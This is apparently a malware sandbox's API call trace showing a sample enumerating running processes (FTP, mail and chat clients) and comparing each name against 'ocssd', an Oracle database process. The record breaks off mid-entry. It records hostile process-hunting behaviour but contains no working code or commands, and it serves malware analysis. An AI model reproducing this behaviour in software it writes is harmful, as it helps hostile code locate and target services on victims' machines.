[0092.599] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0092.599] StrStrIA (lpFirst="opens-versions.exe", lpSrch="ocssd") returned 0x0 [0092.599] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0092.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0092.601] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x35667f0 [0092.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x35667f0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0092.601] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0092.601] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="ocssd") returned 0x0 [0092.601] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0092.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.602] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543718 [0092.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543718, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0092.602] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0092.602] StrStrIA (lpFirst="3dftp.exe", lpSrch="ocssd") returned 0x0 [0092.602] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0092.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.603] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35433d8 [0092.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x35433d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0092.603] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0092.603] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="ocssd") returned 0x0 [0092.604] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0092.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.605] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543700 [0092.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543700, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0092.605] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0092.605] StrStrIA (lpFirst="alftp.exe", lpSrch="ocssd") returned 0x0 [0092.605] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0092.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.606] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35435c8 [0092.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x35435c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0092.606] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0092.606] StrStrIA (lpFirst="barca.exe", lpSrch="ocssd") returned 0x0 [0092.606] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0092.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.608] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543778 [0092.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3543778, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0092.608] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0092.608] StrStrIA (lpFirst="bitkinex.exe", lpSrch="ocssd") returned 0x0 [0092.608] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0092.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.609] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543730 [0092.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0092.609] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0092.609] StrStrIA (lpFirst="coreftp.exe", lpSrch="ocssd") returned 0x0 [0092.609] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0092.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0092.610] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547788 [0092.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3547788, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0092.610] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0092.610] StrStrIA (lpFirst="far.exe", lpSrch="ocssd") returned 0x0 [0092.610] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0092.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.655] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3543628 [0092.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3543628, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0092.655] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0092.655] StrStrIA (lpFirst="filezilla.exe", lpSrch="ocssd") returned 0x0 [0092.655] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0092.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.656] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543748 [0092.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3543748, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.656] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0092.656] StrStrIA (lpFirst="flashfxp.exe", lpSrch="ocssd") returned 0x0 [0092.656] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0092.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.658] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543880 [0092.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3543880, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0092.658] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0092.658] StrStrIA (lpFirst="fling.exe", lpSrch="ocssd") returned 0x0 [0092.658] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0092.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.707] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3543258 [0092.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3543258, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0092.707] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0092.707] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="ocssd") returned 0x0 [0092.707] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0092.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.709] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35434f8 [0092.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x35434f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0092.709] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0092.709] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="ocssd") returned 0x0 [0092.709] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0092.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0092.710] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35477b8 [0092.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x35477b8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0092.710] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0092.710] StrStrIA (lpFirst="icq.exe", lpSrch="ocssd") returned 0x0 [0092.710] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0092.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.712] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543760 [0092.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543760, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.712] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0092.712] StrStrIA (lpFirst="leechftp.exe", lpSrch="ocssd") returned 0x0 [0092.712] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0092.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.713] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543670 [0092.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543670, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0092.713] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0092.713] StrStrIA (lpFirst="ncftp.exe", lpSrch="ocssd") returned 0x0 [0092.713] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0092.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.715] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35437f0 [0092.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x35437f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0092.715] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0092.715] StrStrIA (lpFirst="notepad.exe", lpSrch="ocssd") returned 0x0 [0092.715] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0092.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.716] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3543640 [0092.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3543640, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0092.716] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0092.716] StrStrIA (lpFirst="operamail.exe", lpSrch="ocssd") returned 0x0 [0092.716] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0092.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.718] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35436b8 [0092.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x35436b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0092.718] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0092.718] StrStrIA (lpFirst="outlook.exe", lpSrch="ocssd") returned 0x0 [0092.718] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0092.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.719] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3543838 [0092.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3543838, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0092.719] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0092.719] StrStrIA (lpFirst="pidgin.exe", lpSrch="ocssd") returned 0x0 [0092.719] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0092.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.721] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3543850 [0092.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543850, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0092.721] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0092.721] StrStrIA (lpFirst="scriptftp.exe", lpSrch="ocssd") returned 0x0 [0092.721] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0092.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.753] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543658 [0092.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3543658, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0092.753] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0092.753] StrStrIA (lpFirst="skype.exe", lpSrch="ocssd") returned 0x0 [0092.753] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0092.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.755] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543688 [0092.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543688, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.755] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: 